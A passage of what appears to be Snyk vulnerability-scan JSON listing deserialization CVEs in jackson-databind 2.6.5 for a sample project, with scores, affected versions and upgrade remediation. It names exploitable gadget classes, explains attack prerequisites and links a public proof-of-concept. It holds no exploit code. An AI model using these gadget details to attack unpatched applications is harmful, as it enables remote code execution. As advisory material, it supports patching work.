\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + 
